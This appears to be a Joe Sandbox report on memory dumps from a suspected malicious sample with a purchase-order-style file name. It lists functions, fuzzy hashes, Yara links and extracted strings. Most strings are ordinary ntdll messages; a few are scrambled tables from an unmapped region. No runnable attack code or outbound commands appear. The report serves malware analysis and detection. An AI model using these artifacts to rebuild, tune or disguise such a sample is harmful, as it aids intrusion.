Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6ca8f9fb8e482bd92cd392929163298acb6e995813eec6bef43883ee905f70
Instruction ID: 5ec5cee2217f02652cf46cb5b1cfde8934022d71e9c9bedadc1c41f59a1cca67
Opcode Fuzzy Hash: de6ca8f9fb8e482bd92cd392929163298acb6e995813eec6bef43883ee905f70
Instruction Fuzzy Hash: D990023124100412D681715995046170009E7D0241F91C417A8814554EC6658A56BA61

Function 01042CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbed215779b9b1dcc4d375d7bf05d336dfdb2163b6ce706c866202882d2063fb
Instruction ID: 6dacf511c6ca73fe3dd8c80e02e73991d7e44b8d52ca800139f0e8b882f6dc63
Opcode Fuzzy Hash: fbed215779b9b1dcc4d375d7bf05d336dfdb2163b6ce706c866202882d2063fb
Instruction Fuzzy Hash: C5900231242041629A85B15995045174006E7E0241791C417A9804950CC5369856E621

Function 01042F00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb627f9e56904d73f0bec08f75077b1c3ee0078d6a682628c8b75128b15a561
Instruction ID: 8fcefcb949ffa5aeadac7fa12588f79711cfdb49da7014f03bb77d36136c4930
Opcode Fuzzy Hash: feb627f9e56904d73f0bec08f75077b1c3ee0078d6a682628c8b75128b15a561
Instruction Fuzzy Hash: 6D90023121180052D74065699D14B170005D7D0303F51C51AA8544554CC92588616521

Function 01042F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91123ab8ee87fb2323cd57f63faa38f1e79c4afe81926ca3ff4afb3def5e43b
Instruction ID: 9c73cda1b275638e3c35a7034ce611e86871d054d16872e5369253e748c23110
Opcode Fuzzy Hash: a91123ab8ee87fb2323cd57f63faa38f1e79c4afe81926ca3ff4afb3def5e43b
Instruction Fuzzy Hash: 1890023120144452D68062599904B1F4105D7E1202F91C41EAC546554CC92588556721

Function 01042FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec66cc3418cb86fabe067ce40ede669810e0abb7cc2540db063896922cfcf17
Instruction ID: c37077e3773b516e8e0151bb1e7595f83e70e4ff1f44d12ef73136812cb9a20f
Opcode Fuzzy Hash: fec66cc3418cb86fabe067ce40ede669810e0abb7cc2540db063896922cfcf17
Instruction Fuzzy Hash: 5490023124100812D6807159D5147170006D7D0601F51C416A8414554DC626896576B1

Function 01042E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a78c76186772a7ac6cdfe94003f8b99f9462be17685af6f59eed2e2d51fd02
Instruction ID: b58cc0477578cd7809ecf9b7049f09e695261f6e085f119b0e10fdbad2150ede
Opcode Fuzzy Hash: b0a78c76186772a7ac6cdfe94003f8b99f9462be17685af6f59eed2e2d51fd02
Instruction Fuzzy Hash: FB90027120140413D680655999046170005D7D0302F51C416AA454555ECA398C517135

Function 01042E50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc5eadc135b20a07df084468714ce683b8cc575ae551e468f2c5d9655e706aca
Instruction ID: b08b552207dd345e2102afaa776de72b75842847cbb5c29deb0f23d49f7c51aa
Opcode Fuzzy Hash: cc5eadc135b20a07df084468714ce683b8cc575ae551e468f2c5d9655e706aca
Instruction Fuzzy Hash: 1590027134100452D64061599514B170005D7E1301F51C41AE9454554DC629CC527126

Function 01042E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1533ad252a1dabf38c1ecf6d28c9f1917185fb338683473c3d8704e894b10bc
Instruction ID: f86291fd7f74f0ee5789be179eb184dcdc1d0eb35b279301baaf12c6bdc87879
Opcode Fuzzy Hash: c1533ad252a1dabf38c1ecf6d28c9f1917185fb338683473c3d8704e894b10bc
Instruction Fuzzy Hash: 1C90047131100053D744715DD5047170045D7F1301F51C417FF544554CC53DCC717135

Function 01042EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13914856c0083c7cb4205594cad660b2f6ed3ce94b6369b595f96a51c3891f4
Instruction ID: 9af3e0e3192a035a5d928a5f8b18d22b5cbb156c3fd7e2cc0f0a56400cf6a708
Opcode Fuzzy Hash: b13914856c0083c7cb4205594cad660b2f6ed3ce94b6369b595f96a51c3891f4
Instruction Fuzzy Hash: A990023120140412D640615999087570005D7D0302F51C416AD554555EC675C8917531

Function 01042ED0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e40e0dbc2d265cd7cca7ce09e7de396c80d945f68410abbfafff374741c4599d
Instruction ID: df60a91783a79649001b222a0d53aed88c0e5df3fbc8526102c75811fda63535
Opcode Fuzzy Hash: e40e0dbc2d265cd7cca7ce09e7de396c80d945f68410abbfafff374741c4599d
Instruction Fuzzy Hash: BB9002316010005286807169D9449174005FBE1211751C526A8D88550DC56988656665

Function 01042B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: be3b76904f7d74733fffe718cc07b2ea58574f33961b51fb50825cdd7a930d4f
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 00EBDF99 Relevance: 56.5, Strings: 45, Instructions: 209COMMON

Download Yara Rule

Strings

@@@@, xrefs: 00EBE0E5
@@@@, xrefs: 00EBE16A
89:;, xrefs: 00EBE021
@@@@, xrefs: 00EBE139
4567, xrefs: 00EBE01A
@@@@, xrefs: 00EBE101
@@@@, xrefs: 00EBE0C9
@@@@, xrefs: 00EBE140
@@@@, xrefs: 00EBE0F3
@@@@, xrefs: 00EBE11D
@@@@, xrefs: 00EBE132
)*+,, xrefs: 00EBE08A
@@@@, xrefs: 00EBE0A6
@@@@, xrefs: 00EBE0AD
@@@@, xrefs: 00EBE116
@@@@, xrefs: 00EBE0EC
@@@@, xrefs: 00EBE178
@@@@, xrefs: 00EBE12B
@@@@, xrefs: 00EBE02F
@@@@, xrefs: 00EBE067
@@@@, xrefs: 00EBE0DE
@@@@, xrefs: 00EBE14E
?, xrefs: 00EBE190
@@@@, xrefs: 00EBE0D0
@@@@, xrefs: 00EBE0FA
@@@@, xrefs: 00EBE155
@@@@, xrefs: 00EBE108
@@@@, xrefs: 00EBE0D7
@@@@, xrefs: 00EBE0BB
-./0, xrefs: 00EBE091
@@@@, xrefs: 00EBE09F
!"#$, xrefs: 00EBE07C
@@@@, xrefs: 00EBE171
@@@@, xrefs: 00EBE163
@@@@, xrefs: 00EBE0C2
123@, xrefs: 00EBE098
@@@?, xrefs: 00EBE013
<=@@, xrefs: 00EBE028
@@@@, xrefs: 00EBE10F
%&'(, xrefs: 00EBE083
@@@@, xrefs: 00EBE0B4
@@@@, xrefs: 00EBE17F
@@@@, xrefs: 00EBE15C
@@@@, xrefs: 00EBE147
@@@@, xrefs: 00EBE124

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 38e4fe8f925d390a506244f5268f96c37fd751eb25c5e3d85170b0783efe651f
Instruction ID: d5e7a8484722e1e717ed56d1d5a5350be18d1c8e6573541029ffea10bf100ab5
Opcode Fuzzy Hash: 38e4fe8f925d390a506244f5268f96c37fd751eb25c5e3d85170b0783efe651f
Instruction Fuzzy Hash: 20915FF04083948AC7158F59A0612AFFFB5EBC6305F15816DE7E6BB243C3BE89058B95

Function 00EB3BE1 Relevance: 27.6, Strings: 22, Instructions: 81COMMON

Download Yara Rule

Strings

Dvqv, xrefs: 00EB3C88
"9'7, xrefs: 00EB3C0A
?O&&, xrefs: 00EB3C11
e~8", xrefs: 00EB3C8F
\~c8, xrefs: 00EB3C42
;7{~, xrefs: 00EB3C5E
r@ru, xrefs: 00EB3C3B
&7?\, xrefs: 00EB3C50
{{v8, xrefs: 00EB3BFE
rt|x, xrefs: 00EB3C6C
>7Qx, xrefs: 00EB3C73
xer7, xrefs: 00EB3C81
Vgg{, xrefs: 00EB3C34
Zxm~, xrefs: 00EB3BF7
$/9&, xrefs: 00EB3C96
_CZ[, xrefs: 00EB3C57
"$/9, xrefs: 00EB3C49
,7[~, xrefs: 00EB3C18
o/!H, xrefs: 00EB3C26
|r7P, xrefs: 00EB3C65
ybo7, xrefs: 00EB3C1F
!#>7, xrefs: 00EB3C2D

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: !#>7$"$/9$"9'7$$/9&$&7?\$,7[~$;7{~$>7Qx$?O&&$Dvqv$Vgg{$Zxm~$\~c8$_CZ[$e~8"$o/!H$r@ru$rt|x$xer7$ybo7${{v8$|r7P
API String ID: 0-4058658518
Opcode ID: 75b7b9e41e4b2c1eb3b93ae97fd05196d5017fe24dfbe93929caddc7c0559aff
Instruction ID: 146530511f2936836cf69cec65581ed05663f20aa8aca75e6c040cb1d795d8b8
Opcode Fuzzy Hash: 75b7b9e41e4b2c1eb3b93ae97fd05196d5017fe24dfbe93929caddc7c0559aff
Instruction Fuzzy Hash: F7319AB480478C8ECB15DFA5E5452DDBFB0FB01310F645189D095AF29ADB784A46CF8A

Function 01037550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01074530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01074507
Execute=1, xrefs: 0107451E
ExecuteOptions, xrefs: 010744AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01074460
CLIENT(ntdll): Processing section info %ws..., xrefs: 01074592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0107454D

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: f756d83a89475359ca010356b4aaf79758a761a31b448868d47991bd3833ebe8
Instruction ID: df1836838d9ecac3ce64a8f97a78463f8497ea3edc62e8dc747472df8467caca
Opcode Fuzzy Hash: f756d83a89475359ca010356b4aaf79758a761a31b448868d47991bd3833ebe8
Instruction Fuzzy Hash: 0A5139B1A0024AAAEF25AB99DC95FED77ACBF98300F0404E9D585A71C1D770DA40DF54

Function 0101A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

Actx , xrefs: 01067819, 01067880
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 010678F3
RtlpFindActivationContextSection_CheckParameters, xrefs: 010677DD, 01067802
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010677E2
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01067807
SsHd, xrefs: 0101A304

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 18b9dbfbed80b6d332199385393a020363bcaae14623f24a9b777099af73967c
Instruction ID: d5d8a4f9f1e606bf3aee44e84518af14a1e7cfa0f41adc2baf9e009f4b404fd4
Opcode Fuzzy Hash: 18b9dbfbed80b6d332199385393a020363bcaae14623f24a9b777099af73967c
Instruction Fuzzy Hash: 9DE1F030709382CFE765CE28C48476ABBE5BB84328F144A6DF9D5CB295D779D844CB82

Function 0101D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01069299

Strings

Actx , xrefs: 01069315
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 01069372
RtlpFindActivationContextSection_CheckParameters, xrefs: 0106914E, 01069173
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01069153
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01069178
GsHd, xrefs: 0101D794

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: b9e8c6bedd70ce1f87c40dbf7c3f655fd3c6b0c19308183baab475304cf1142e
Instruction ID: 9449db93127eee2df6e7261d699db0183f509559eebb4537faa747b9959d7181
Opcode Fuzzy Hash: b9e8c6bedd70ce1f87c40dbf7c3f655fd3c6b0c19308183baab475304cf1142e
Instruction Fuzzy Hash: 18E1E170604342DFDB60CF58C884B5ABBE9BF88318F044A6DF9D98B685D735E844CB92

Function 010DA1F0 Relevance: 12.3, APIs: 8, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010DA25D
RtlDebugPrintTimes.NTDLL ref: 010DA2F1
RtlDebugPrintTimes.NTDLL ref: 010DA314
RtlDebugPrintTimes.NTDLL ref: 010DA340
RtlDebugPrintTimes.NTDLL ref: 010DA415
RtlDebugPrintTimes.NTDLL ref: 010DA468
RtlDebugPrintTimes.NTDLL ref: 010DA487
RtlDebugPrintTimes.NTDLL ref: 010DA4B8

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: fed7994138ceb170bba9337b65f654660d335f0cb3bf2e0da713e1ddf423ed21
Instruction ID: 7550a29970d90490a310346ccd27d06b25a79523828fedc434b7d10103498dcc
Opcode Fuzzy Hash: fed7994138ceb170bba9337b65f654660d335f0cb3bf2e0da713e1ddf423ed21
Instruction Fuzzy Hash: 08A16971B04312CFD714CE28C894A2ABBE6BF88214F18456DFA86DB311EB75EC41CB91

Function 00FF6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 00FF6614
RtlDebugPrintTimes.NTDLL ref: 00FF665F

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01059843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01059885
minkernel\ntdll\ldrinit.c, xrefs: 01059854, 01059895
LdrpLoadShimEngine, xrefs: 0105984A, 0105988B

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 2c3fd53303bf1c81ceeceeb0ecdb2f74dedb665078ac42104d120a3b7753fc79
Instruction ID: ab1506d025d21ea351558d97fe1a10105d7f73a93001ffa2b8cb46a6d0c3430a
Opcode Fuzzy Hash: 2c3fd53303bf1c81ceeceeb0ecdb2f74dedb665078ac42104d120a3b7753fc79
Instruction Fuzzy Hash: BA510632A00358DBDB24EBA8CC56BED77A6BF54718F040169EA81EF299DB759C40D740

Function 01009046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01062360

Strings

@, xrefs: 01009095
$, xrefs: 010090B1

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 49acbbcc9857c13f375cad51968751233437369a39fe96eeb531c447cbec9162
Instruction ID: 661e4402c5b06e20d2811a3b158a21861b67f797e9adf1bb21cfea7e9d633be7
Opcode Fuzzy Hash: 49acbbcc9857c13f375cad51968751233437369a39fe96eeb531c447cbec9162
Instruction Fuzzy Hash: D1811B71D002699BDB35DF54CC45BEEB6B8AB08714F0041EAEA4DB7290D7719E85CFA0

Function 010AECD7 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010AEDD0
RtlDebugPrintTimes.NTDLL ref: 010AEE45

Strings

---------------------------------------, xrefs: 010AEDF9
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 010AEDE3
Entry Heap Size , xrefs: 010AEDED

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size
API String ID: 3446177414-4022145052
Opcode ID: b92c30c519accb601deb75444b442db597568f93fe3bd2aae9dd298980fb6fd7
Instruction ID: 04046cb887b3cabd5ade5c221ee9035d2c407fb1c6b3170396959fb08faaf627
Opcode Fuzzy Hash: b92c30c519accb601deb75444b442db597568f93fe3bd2aae9dd298980fb6fd7
Instruction Fuzzy Hash: 6041BF35A00215DFCB25EF5CC48196ABBF5FF45354B6580ADD988DB625C732EC42CB90

Function 00FFF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0105E51F

Strings

HEAP: , xrefs: 0105E49D
HEAP[%wZ]: , xrefs: 0105E490
(HeapHandle != NULL), xrefs: 0105E4A8

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 05bdd248c2c166996ef3089e9093bbb002c66768b527dcd27974006758ae51da
Instruction ID: 218790a586dabffabc8275eae96218eaae7392b1e05c700c90793b0f70672ad3
Opcode Fuzzy Hash: 05bdd248c2c166996ef3089e9093bbb002c66768b527dcd27974006758ae51da
Instruction Fuzzy Hash: 71915871704745AFD725DB28CC80B7AB7D5BF44710F040469FAC58B2A2EB78D948EB91

Function 01029723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01029922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0106DAFF
LdrpUnloadNode, xrefs: 0106DAF5
Unmapping DLL "%wZ", xrefs: 0106DAEE

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 3522ad5d98055aa64b561253b1bc441f1a2cbb78ab15f096762bf79475c0d8bf
Instruction ID: fa6ca4bda52eb0d4599998ae2280c9a36b2d0c3917998929172116a68ba74dc2
Opcode Fuzzy Hash: 3522ad5d98055aa64b561253b1bc441f1a2cbb78ab15f096762bf79475c0d8bf
Instruction Fuzzy Hash: 1A5124317003229BD725EF3CC885B6DB7E1BB98718F18066DE5C18B695EBB5E804CB91

